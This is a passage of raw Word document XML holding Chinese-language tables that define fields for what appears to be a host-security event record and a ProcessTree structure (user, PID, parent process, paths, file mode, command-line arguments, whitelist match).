          </w:tcPr>
          <w:p w14:paraId="27C4E217" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72EFFB3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BAF153F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56CED5EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F195E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A0F95BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5369271F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B85C72B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>currentPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5636BA6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C9AC08A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D938EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47978084" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="040EC05C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F632B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340426D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E51EA55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24E50C93" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2A264A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentPid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E0BB2A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D1C5B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="679A48BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="559307E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02201755" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242BC6A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E701BE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DEA6E36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73D632AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A2ED2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7971C364" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C61D0B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F8F9F11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32914EBC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B631F70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>stfInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24BA10FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112A72C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24823754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标准I/O信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="031555FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B864523" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processTree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39170417" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4304BEEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281D3209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程树,按顺序为父进程至子进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E09E053" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6490B921" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F1B0840" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B1840E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C7E22CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BEF9F6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>ProcessTree数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1632"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1838"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5366E33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2C3F92E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="733B38B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41FBD0F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="748CAA1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="722A870A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D279650" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62BE5307" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A8416D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786C69FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="458AC854" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648B8823" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F28A25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EAA88B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4B445F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动用户ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="48633319" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783413DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00EAB47F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="471B0A08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735CC0F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="622859DA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20AC13A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ppid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047A079F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5883031A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="351AD9F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接进程父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="387323F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410BF5D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E2CCF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51DDD860" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C2C101" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AABB3BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3436D9ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375318DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09ED9FDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C1AC95B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="137FEBB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="181AB03A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E769C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12D0CBEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2C59DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EDBF0A1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D82BE7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>fileMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BD2E103" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340EDF85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A1CA55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>完整文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63941D73" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26AB0A7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>euidUserName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ABE0128" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363F014C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A218911" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程euid用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D8969A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="443AC188" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1F68CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59047DFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C61C32D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BA69FAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
